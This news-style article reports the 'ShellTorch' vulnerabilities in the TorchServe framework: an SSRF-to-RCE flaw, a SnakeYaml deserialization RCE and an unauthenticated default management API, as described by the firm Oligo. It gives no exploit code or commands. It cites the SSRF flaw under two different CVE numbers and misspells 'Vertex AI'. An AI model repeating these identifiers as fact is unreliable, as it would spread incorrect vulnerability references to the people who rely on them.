A set of critical vulnerabilities in the TorchServe machine learning framework has been discovered, posing a significant threat to artificial intelligence (AI) models. The bugs affect popular machine learning services offered by Amazon and Google, as well as various other companies. The vulnerabilities highlight the susceptibility of AI applications to open source bugs and the potential for malicious actors to exploit them.
TorchServe is an open source framework used for deploying deep-learning models based on the PyTorch machine learning library in production environments. It is maintained by Amazon and Meta, and is widely utilized by large organizations including Walmart, Amazon, Microsoft Azure, Google Cloud, and others. However, the recently-discovered vulnerabilities in TorchServe have raised serious concerns regarding the security of AI models.
If successfully exploited, these vulnerabilities could allow threat actors to access confidential data within AI models, insert malicious models into production environments, manipulate the results of machine learning models, and gain complete control over servers. The potential for unauthorized access and other malicious actions is particularly concerning, considering that thousands of vulnerable instances of the software are publicly exposed on the internet.
The vulnerabilities, collectively referred to as “ShellTorch” by the cybersecurity firm Oligo who discovered them, have been given critical severity ratings. One of the vulnerabilities, known as CVE-2023-43654, is a server-side request forgery (SSRF) flaw that enables remote code execution (RCE). Another vulnerability, CVE-2022-1471, involves a Java deserialization RCE. The third vulnerability stems from the default configuration of TorchServe, which exposes a critical management API to the internet. Many organizations and projects based on TorchServe have not changed the default configuration, resulting in a major security vulnerability.
According to Oligo researchers, the misconfiguration affects self-managed services of major machine learning providers such as Amazon AWS SageMaker, Google Vertex AT, and several other projects built on TorchServe. This misconfiguration is particularly problematic because the management interface can be accessed without any authentication, allowing anyone to exploit the vulnerability.
While correct configuration of the management interface can close one major attack vector, there are still additional vectors that can be exploited. Oligo identified one of these vectors as CVE-2023-43564, which is the SSRF flaw in the TorchServe API. This flaw allows attackers to upload a malicious model into a production environment, resulting in arbitrary code execution. Furthermore, CVE-2022-1471 is an RCE vulnerability in SnakeYaml, which is implemented by TorchServe. By uploading a machine learning model with a malicious YAML file, attackers can trigger an attack that leads to RCE on the underlying server.
The discovery of these vulnerabilities emphasizes the risks associated with AI applications and their exposure to open source code. The consequences of these vulnerabilities are amplified in the realm of AI, given the wide range of use cases for large language models and other AI technologies. Exploiting vulnerabilities like ShellTorch can enable attackers to manipulate AI models, leading to the generation of misleading answers and other destructive outcomes.
The co-founder and CTO of Oligo, Gal Elbaz, emphasizes that AI is a groundbreaking technology with tremendous potential, but it also presents new risks that must be addressed. As AI infrastructure is increasingly adopted, new strategies and measures must be implemented to protect against these vulnerabilities. The evolution of security practices is crucial to safeguarding AI infrastructure and mitigating the risks associated with AI applications.

